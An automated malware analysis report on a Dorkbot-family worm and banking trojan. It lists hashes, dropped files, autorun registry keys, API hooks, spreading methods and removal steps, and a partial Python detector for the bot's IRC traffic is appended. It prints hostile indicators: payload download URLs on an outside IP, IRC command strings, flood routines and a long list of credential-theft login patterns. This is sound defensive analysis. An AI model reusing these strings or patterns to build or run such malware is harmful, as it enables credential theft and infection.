HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Heur.Zygug.5 (B) (Emsisoft), Gen:Heur.Zygug.5 (AdAware), Worm.Win32.Dorkbot.FD, mzpefinder_pcap_file.YR, WormDorkbot.YR, GenericUDPFlooder.YR, GenericIRCBot.YR, GenericMSNWorm.YR, GenericUSBInfector.YR, GenericDNSBlocker.YR, GenericAutorunWorm.YR, GenericSYNFlooder.YR, GenericInjector.YR, BankerGeneric.YR, GenericProxy.YR, GenericPhysicalDrive0.YR (Lavasoft MAS)
Behaviour: Banker, Trojan, Flooder, Worm, WormAutorun, IRCBot, MSNWorm, DNSBlocker, UDPFlooder, SYNFlooder, Trojan-Proxy, USBInfector
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: d8dd74e13d9d77a32b5ffcfcb8637c74
SHA1: 350d58f67a3015f3af5eb13223dc278748a86281
SHA256: e77dfe7b402e6d96a152a0c44f178166832b1497ebf7cd5edd3b12af4ffaffda
SSDeep: 3072:QIZWWxukZThtCdVBJvXIATEi S9ofjh4BwL1/BKbcltbAX2:QIIWxu hOVTXIAQDSifjh4Bwx/B9ltK
Size: 148992 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company:
Created at: 2011-04-26 19:59:02
Analyzed on: Windows7 SP1 32-bit
Summary: Banker. Steals data relating to online banking systems, e-payment systems and credit card systems.
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer. |
IRCBot | A bot can communicate with command and control servers via IRC channel. |
MSNWorm | A worm can spread its copies through MSN Messenger. |
DNSBlocker | A program can block designated DNS servers, making it difficult for users to locate specific domains or web sites on the Internet. |
UDPFlooder | This program can make a UDP flood. A UDP flood attack is a denial-of-service attack using the User Datagram Protocol (UDP). It can be initiated by sending a large number of UDP packets to random ports on a remote host. |
SYNFlooder | This program can make a SYN flood. It is a form of denial-of-service attack in which an attacker sends a succession of SYN requests to a target's system in an attempt to consume enough server resources to make the system unresponsive to legitimate traffic. |
Trojan-Proxy | This program can launch a proxy server (SOCKS4) on a designated TCP port. |
USBInfector | A program can register a device notification with the help of RegisterDeviceNotification, so it is notified when a USB device is plugged in; the worm then copies itself to the USB device plugged into the affected computer. |
Process activity
The Trojan creates the following process(es):
C487.exe:1468
%original file name%.exe:1904
The Trojan injects its code into the following process(es):
twunk_16.exe:3204
twunk_16.exe:3392
mspaint.exe:316
B5D6.exe:1928
svchost.exe:2060
csrss.exe:368
winlogon.exe:416
conhost.exe:1456
Dwm.exe:2008
taskhost.exe:1940
Explorer.EXE:2024
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process C487.exe:1468 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\alFSVWJB\twunk_16.exe (2755 bytes)
The process twunk_16.exe:3204 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\Tasks\alFSVWJB.job (328 bytes)
The process mspaint.exe:316 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\C487.exe (868 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\B5D6.exe (441 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Hplqlx.exe (673 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\B5D6.tmp (0 bytes)
C:\%original file name%.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\C487.tmp (0 bytes)
The process %original file name%.exe:1904 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\ScreenSaverPro.scr (673 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\temp.bin (673 bytes)
Registry activity
The process C487.exe:1468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"twunk_16.exe" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\alFSVWJB\twunk_16.exe"
The process mspaint.exe:316 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\mspaint_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\mspaint_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\mspaint_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\mspaint_RASMANCS]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\mspaint_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\mspaint_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3D 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\mspaint_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\mspaint_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\mspaint_RASAPI32]
"EnableConsoleTracing" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Hplqlx" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Hplqlx.exe"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
The process %original file name%.exe:1904 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\d8dd74e13d9d77a32b5ffcfcb8637c74_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\d8dd74e13d9d77a32b5ffcfcb8637c74_RASAPI32]
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\d8dd74e13d9d77a32b5ffcfcb8637c74_RASMANCS]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\d8dd74e13d9d77a32b5ffcfcb8637c74_RASAPI32]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\d8dd74e13d9d77a32b5ffcfcb8637c74_RASMANCS]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\d8dd74e13d9d77a32b5ffcfcb8637c74_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\d8dd74e13d9d77a32b5ffcfcb8637c74_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Screen Saver Pro 3.1" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\ScreenSaverPro.scr"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
Dropped PE files
MD5 | File path |
---|---|
4378a8da40338491ea9a278934ac7b17 | c:\Users\"%CurrentUserName%"\AppData\Roaming\B5D6.exe |
880f6421b7d7d4e2e9f83a7e87c3ec3b | c:\Users\"%CurrentUserName%"\AppData\Roaming\alFSVWJB\twunk_16.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Trojan installs the following user-mode hooks in urlmon.dll:
URLDownloadToFileA
URLDownloadToFileW
The Trojan installs the following user-mode hooks in WININET.dll:
HttpSendRequestA
HttpSendRequestW
InternetWriteFile
The Trojan installs the following user-mode hooks in DNSAPI.dll:
DnsQuery_A
DnsQuery_W
The Trojan installs the following user-mode hooks in WS2_32.dll:
send
GetAddrInfoW
The Trojan installs the following user-mode hooks in kernel32.dll:
MoveFileA
MoveFileW
CopyFileA
CreateFileA
CreateFileW
CopyFileW
The Trojan installs the following user-mode hooks in ntdll.dll:
LdrLoadDll
ZwResumeThread
NtQueryDirectoryFile
ZwEnumerateValueKey
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer. A program can register a device notification with the help of RegisterDeviceNotification, so it is notified when a USB device is plugged in; the worm then copies itself to the USB device plugged into the affected computer. A worm can spread its copies through MSN Messenger.
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
C487.exe:1468
%original file name%.exe:1904
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Users\"%CurrentUserName%"\AppData\Roaming\alFSVWJB\twunk_16.exe (2755 bytes)
C:\Windows\Tasks\alFSVWJB.job (328 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\C487.exe (868 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\B5D6.exe (441 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Hplqlx.exe (673 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\ScreenSaverPro.scr (673 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\temp.bin (673 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"twunk_16.exe" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\alFSVWJB\twunk_16.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Hplqlx" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Hplqlx.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Screen Saver Pro 3.1" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\ScreenSaverPro.scr"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: UnH Solutions
Product Name: Kaf
Product Version:
Legal Copyright:
Legal Trademarks: Ewyg Tesikit Ebixiz Ecuwy Besif Ofyroho Eku
Original Filename: 15wjn3qq3doye4t.exe
Internal Name: Mifuz
File Version:
File Description: Oqaf Dab Ygij
Comments:
Language: Language Neutral
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 98633 | 98816 | 4.75561 | 1af5a88a2f631d5d298b1bef0459fc5f |
.data | 106496 | 45640 | 46080 | 4.81555 | 541038287c5b73bc2df444eb90f8935c |
.rdata | 155648 | 1247 | 1536 | 2.89672 | f7dd77086cf158a2130e33a06633db8e |
.rsrc | 159744 | 8188 | 1536 | 1.70366 | 7a30d51cb7179aad10250e7ce128affb |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 8
bfdf64c2aaf06fb340ae6684806d2816
04808c95e2884f12c111ac8cec1d97f0
616b08f9b33aa929893c9a1a0a41580f
d0197bdcf1751841ed813b866d1b5e48
5d2607e7d9f441ffad9c9b21c868f906
f3cb37bae86a3eae34add7693c62a153
f2d940ffdad415b8f0ade3291a1a4f0d
832bd4205e3b8f339833d7cb35f13378
Network Activity
URLs
URL | IP |
---|---|
hxxp://api.wipmania.com/ | 212.83.168.196 |
hxxp://177.54.153.4/and927218.exe | |
hxxp://177.54.153.4/nut927218.exe | |
api.wipmania.net | 136.243.118.242 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /and927218.exe HTTP/1.1
User-Agent: Mozilla/4.0
Host: 177.54.153.4
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Fri, 25 Nov 2016 20:28:21 GMT
Accept-Ranges: bytes
ETag: "eecec8765a47d21:0"
Server: Microsoft-IIS/7.5
Date: Sat, 26 Nov 2016 09:00:47 GMT
Content-Length: 220672
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........h..............qh......q{......qk.f...............&...........................Rich....................PE..L.....8X.....................................0....@..........................................................................=......................................................................(8..@............0...............................text...K........................... ..`.rdata.."....0......."..............@..@.data........P.......@..............@....rsrc................V..............@..@................................................................................................................................................................................................................................................................................................................................................................................................U......E..E...].U..3.]..........U....$.E.U....E......E..E..E..E.h.E.8.C..w...f.M..E.D.C..E........ C..]..E........U.....U..}............E.P.M.Q.U.R.E.Ph..C..s.......M.Q.U.R.E.P.M.QhT.C..V......j.j.j.h..C..C........U.R..E.P..M.Q..U.Rh..C.."........E.P..M.Q..U.R..E.Ph0.C..R.......M.Qh..C..........E...3...]...............U..QSV.E..'...u.j@...0A.......o.......... .3..........eC.^[..]..U........VW..0A..........0A.........X.........p.........t.........X.....C...X...R..........p.....t.....t...P..p...Q..X...Rh..C..
<<< skipped >>>
GET /nut927218.exe HTTP/1.1
User-Agent: Mozilla/4.0
Host: 177.54.153.4
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Fri, 25 Nov 2016 20:28:17 GMT
Accept-Ranges: bytes
ETag: "c9805c745a47d21:0"
Server: Microsoft-IIS/7.5
Date: Sat, 26 Nov 2016 09:00:50 GMT
Content-Length: 434176
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........h..............qh......q{......qk.f...............&...........................Rich....................PE..L.....8X.....................................0....@..........................0...............................................~....... ...............................................................z..@............0...............................text...K........................... ..`.rdata..._...0...`..."..............@..@.data...............................@....rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................U......E..E...].U..3.]..........U....$.E.U....E......E..E..E..E.h.E. ^F..w...f.M..E.,^F..E........bF..]..E........U.....U..}............E.P.M.Q.U.R.E.Php^F..s.......M.Q.U.R.E.P.M.Qh<^F..V......j.j.j.h.^F..C........U.R..E.P..M.Q..U.Rh.^F.."........E.P..M.Q..U.R..E.Ph._F..R.......M.Qhl_F..........E...3...]...............U..QSV.E..'...u.j@...0A.......o.......... .3...........F.^[..]..U........VW..0A..........0A.........X.........p.........t.........X...._F...X...R..........p.....t.....t...P..p...Q..X...Rh._
<<< skipped >>>
GET / HTTP/1.1
User-Agent: Mozilla/4.0
Host: api.wipmania.com
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 26 Nov 2016 05:32:18 GMT
Content-Type: text/html
Content-Length: 20
Connection: keep-alive
Keep-Alive: timeout=20
194.242.96.218<br>UA
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
svchost.exe_2060:
.text
`.data
.rsrc
@.reloc
msvcrt.dll
API-MS-Win-Core-ProcessThreads-L1-1-0.dll
KERNEL32.dll
NTDLL.DLL
API-MS-Win-Security-Base-L1-1-0.dll
API-MS-WIN-Service-Core-L1-1-0.dll
API-MS-WIN-Service-winsvc-L1-1-0.dll
RPCRT4.dll
ole32.dll
ntdll.dll
_amsg_exit
RegCloseKey
RegOpenKeyExW
GetProcessHeap
svchost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Services.SvcHost"
Host Process for Windows Services
Software\Microsoft\Windows NT\CurrentVersion\Svchost
Software\Microsoft\Windows NT\CurrentVersion\MgdSvchost
\PIPE\
Host Process for Windows Services
6.1.7600.16385 (win7_rtm.090713-1255)
svchost.exe
Windows
Operating System
6.1.7600.16385
svchost.exe_2060_rwx_00060000_00021000:
.text
.data
.rsrc
@.reloc
IEw.AEw
%systemroot%
%programfiles%\Common Files\*\*.exe
%appdata%\Microsoft\*.exe
%root%\RECYCLER\S-1-5-21-0243556031-888888379-*\*.exe
ole32.dll
/c "%%SystemRoot%%\explorer.exe %Ã%%%s & start %Ã%%%s & exit"
/c "start %Ã%%%s & start %Ã%%%s & exit"
%SystemRoot%\system32\cmd.exe
%SystemRoot%\system32\SHELL32.dll
%s\temp.bin
%s\_[$]_TESTFILE_[$]_
%s\%s
%s\%s.lnk
Windows_Shared_Mutex_231_thisittotalyfuckingshit
\ScreenSaverPro.scr
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
kernel32.dll
ntdll.dll
user32.dll
advapi32.dll
shell32.dll
urlmon.dll
wininet.dll
gdi32.dll
rpcrt4.dll
netapi32.dll
*.exe
.gonewiththewings
*.gonewiththewings
wipmania.com
hXXp://api.wipmania.net/icon/n.api
WindowsId
Microsoft\%s
%s\%s\%s.exe
:Zone.Identifier
.quarantined
"%s" -shell
"%s" -bind
userinit.exe
explorer.exe
Windows critical error, require reboot
Windows Update
GetProcessHeap
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
RegCloseKey
RegOpenKeyA
RegEnumKeyA
RegCreateKeyExA
RegOpenKeyExA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
SHLWAPI.dll
RPCRT4.dll
URLDownloadToFileA
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\RunOnce
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
Software\WindowsId Manager Reader
WindowsMark
`.rdata
@.data
.reloc
=MSG t
>MSG u`
=PASS
8httpu1
8httpuM
tlSSSSSSSSSShL0A
%s.%s
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
msnmsg
CAL %d %6s
ngr->blocksize: %d
block_size: %d
\\.\pipe\%s
%s_%d
-%sMutex
%s-pid
%s-comm
JOIN #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
JOIN %5s
PRIVMSG
JOIN
%s:%d
%s.%s%s
%S%s%s
%s.%S%S
%S%S%S
state_%s
%s.%s (p='%S')
pop3://%s:%s@%s:%d
%s:%s@%s:%d
PTF://%s:%s@%s:%d
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
virusbuster.nprotect.
heck.tc
onecare.live.
login[password]
login[username]
*members*.iknowthatgirl*/members*
*youporn.*/login*
*members.brazzers.com*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*whcms*dologin*
*:2086/login*
*:2083/login*
*:2082/login*
*webnames.ru/*user_login*
Webnames
*dotster.com/*login*
loginid
*enom.com/login*
login.Pass
login.User
*login.Pass=*
*1and1.com/xml/config*
*moniker.com/*Login*
LoginPassword
LoginUserName
*LoginPassword=*
*namecheap.com/*login*
loginname
*godaddy.com/login*
Password
*Password=*
*alertpay.com/login*
*netflix.com/*ogin*
*thepiratebay.org/login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*what.cd/login*
*oron.com/login*
*filesonic.com/*login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploading.com/*login*
loginUserPassword
loginUserName
*loginUserPassword=*
*fileserv.com/login*
*hotfile.com/login*
*4shared.com/login*
txtpass
*txtpass=*
*netload.in/index*
*freakshare.com/login*
login_pass
*login_pass=*
*mediafire.com/*login*
*sendspace.com/login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
session[password]
*password]=*
*twitter.com/sessions
txtPassword
*&txtPassword=*
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*&password=*
*no-ip*/login*
*steampowered*/login*
quick_password
*hackforums.*/member.php
*facebook.*/login.php*
*login.yahoo.*/*login*
passwd
login
*passwd=*
*login.live.*/*post.srf*
TextfieldPassword
*TextfieldPassword=*
*gmx.*/*FormLogin*
*Passwd=*
FLN-Password
*FLN-Password=*
*pass=*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
password
loginId
*password=*
*aol.*/*login.psp*
Passwd
*google.*/*ServiceLoginAuth*
login_password
login_email
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
Host: %s
User-Agent: %s
Mozilla/4.0
\\.\PHYSICALDRIVE0
httpi
dnsapi.dll
hXXp://%s/%s
hXXp://%s/
POST /23s
[%s{%s%s{%s
n%s[%s{%s%s{%s
%s[%s{%s
[DNS]: Redirecting "%s" to "%s"
%s|%s
[Logins]: Cleared %d logins
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
hXXp://
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
icon=shell32.dll,7
shellexecute=
%windir%\system32\cmd.exe
&&%%windir%%\explorer.exe %Ã%%%s
/c "start %Ã%%.Trashes\%s
.Trashes
\\.\%c:
%sautorun.tmp
%sautorun.inf
%0x.scr
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
*facebook.*/ajax/chat/send.php*
-_.!~*'()
%s.%s hijacked!
MSG %d %s %d
MSG %d %1s
SDG %d %d
Content-Length: %d
SDG %d
%s_0xX
RegCreateKeyExW
URLDownloadToFileW
HttpSendRequestW
HttpSendRequestA
NtEnumerateValueKey
DNSAPI.dll
Secur32.dll
HttpQueryInfoA
InternetOpenUrlA
HttpQueryInfoW
WININET.dll
WS2_32.dll
MSVCRT.dll
ConnectNamedPipe
CreateNamedPipeA
DisconnectNamedPipe
GetWindowsDirectoryW
RegNotifyChangeKeyValue
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
SSRR %s 0 0 :%s
KCIK %s
SEND %s %s
PART %s
PPPPMSG %s :%s
QUIT :%s
PPNG %s
PPPPMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
ftpinfect
httplogin
httplogin
httptraff
httptraff
httpspread
httpspread
hXXp://api.wipmania.com/
hXXp://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\x_ipc
7 767
7 767
8*808;8~8
8*808;8~8
{A5DCBF10-6530-11D2-901F-00C04FB951ED}
{A5DCBF10-6530-11D2-901F-00C04FB951ED}
\mspaint.exe
\mspaint.exe
\svchost.exe
\svchost.exe
C:\Windows\system32\mspaint.exe
C:\Windows\system32\mspaint.exe
%s\Microsoft\%s.exe
%s\Microsoft\%s.exe
\\.\pipe
\\.\pipe
Internet Explorer\iexplore.exe
Internet Explorer\iexplore.exe
autorun.inf
autorun.inf
pidgin.exe
pidgin.exe
wlcomm.exe
wlcomm.exe
msnmsgr.exe
msnmsgr.exe
msmsgs.exe
msmsgs.exe
flock.exe
flock.exe
opera.exe
opera.exe
chrome.exe
chrome.exe
ieuser.exe
ieuser.exe
iexplore.exe
iexplore.exe
firefox.exe
firefox.exe
.ipconfig.exe
.ipconfig.exe
verclsid.exe
verclsid.exe
regedit.exe
regedit.exe
rundll32.exe
rundll32.exe
cmd.exe
cmd.exe
regsvr32.exe
regsvr32.exe
l"%s" %S
l"%s" %S
lol.exe
lol.exe
n127.0.0.1
n127.0.0.1
%s:Zone.Identifier
%s:Zone.Identifier
secur32.dll
secur32.dll
ws2_32.dll
ws2_32.dll
:%S%S\Desktop.ini
:%S%S\Desktop.ini
winlogon.exe
winlogon.exe
mspaint.exe
mspaint.exe
Aadvapi32.dll
Aadvapi32.dll
nspr4.dll
nspr4.dll
Akernel23.dll
Akernel23.dll
y%s\%s.exe
y%s\%s.exe
lsass.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
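The C2 format strings in this region (SSRR, KCIK, PPPPMSG, PPNG) sit where an ordinary IRC client would send USER, NICK, PRIVMSG and PONG, so a network signature written for the standard verbs does not match this bot's traffic. The following is an added example, not code from the Lavasoft report or from the bot: a small Python classifier that normalizes the mangled verbs back to their standard form and flags a session that uses them. The verb mapping is an assumption drawn from the argument shapes of the format strings ("SSRR %s 0 0 :%s" has the shape of a USER line, "KCIK %s" of NICK, "PPPPMSG %s :%s" of PRIVMSG, "PPNG %s" of PONG); the sample payloads are constructed, not captured traffic.

```python
"""Flag IRC sessions that use the mangled verbs seen in this strings dump.

Added example, not code from the Lavasoft report or from the bot. The verb
mapping is an assumption from the format strings' argument shapes:
"SSRR %s 0 0 :%s" has the shape of USER, "KCIK %s" of NICK,
"PPPPMSG %s :%s" of PRIVMSG and "PPNG %s" of PONG.
"""
import re
from typing import List, Tuple

# Mangled verb -> standard verb it appears to replace (assumption, see above).
MANGLED_VERBS = {
    b"SSRR": b"USER",
    b"KCIK": b"NICK",
    b"PPPPMSG": b"PRIVMSG",
    b"PPNG": b"PONG",
}
# Verbs the dump shows used unchanged.
PLAIN_VERBS = {b"JOIN", b"PART", b"QUIT", b"SEND", b"PASS"}

# Optional IRCv3 tag block and optional ":prefix", then the command verb.
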